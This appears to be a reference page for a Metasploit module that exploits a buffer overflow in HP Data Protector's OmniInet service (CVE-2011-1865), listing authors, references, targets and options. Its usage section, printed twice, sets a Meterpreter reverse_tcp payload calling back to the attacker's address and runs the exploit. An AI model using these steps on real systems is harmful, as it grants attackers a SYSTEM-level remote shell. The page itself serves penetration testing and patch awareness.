HP OmniInet.exe Opcode 20 Buffer Overflow
This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.
Exploit Rank
- Good
Exploit Authors
- Oren Isacson < >
- muts < >
- dookie < >
- sinn3r < sinn3r [at] metasploit.com >
- corelanc0d3r < peter.ve [at] corelan.be >
Vulnerability References
- CVE-2011-1865
- OSVDB-73571
- EDB-17468
- http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
Exploit Targets
- 0 - HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008 (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/misc/agentxpp_receive_agentx
- exploit/windows/misc/apple_quicktime_rtsp_response
- exploit/windows/misc/asus_dpcproxy_overflow
- exploit/windows/misc/avidphoneticindexer
- exploit/windows/misc/bakbone_netvault_heap
- exploit/windows/misc/bcaaa_bof
- exploit/windows/misc/bigant_server
- exploit/windows/misc/bigant_server_250
- exploit/windows/misc/bigant_server_usv
- exploit/windows/misc/bomberclone_overflow
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/hp_omniinet_4
msf exploit(hp_omniinet_4) > show payloads
msf exploit(hp_omniinet_4) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(hp_omniinet_4) > set LHOST [MY IP ADDRESS]
msf exploit(hp_omniinet_4) > set RHOST [TARGET IP]
msf exploit(hp_omniinet_4) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/hp_omniinet_4
msf exploit(hp_omniinet_4) > show payloads
msf exploit(hp_omniinet_4) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(hp_omniinet_4) > set LHOST [MY IP ADDRESS]
msf exploit(hp_omniinet_4) > set RHOST [TARGET IP]
msf exploit(hp_omniinet_4) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 5555) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |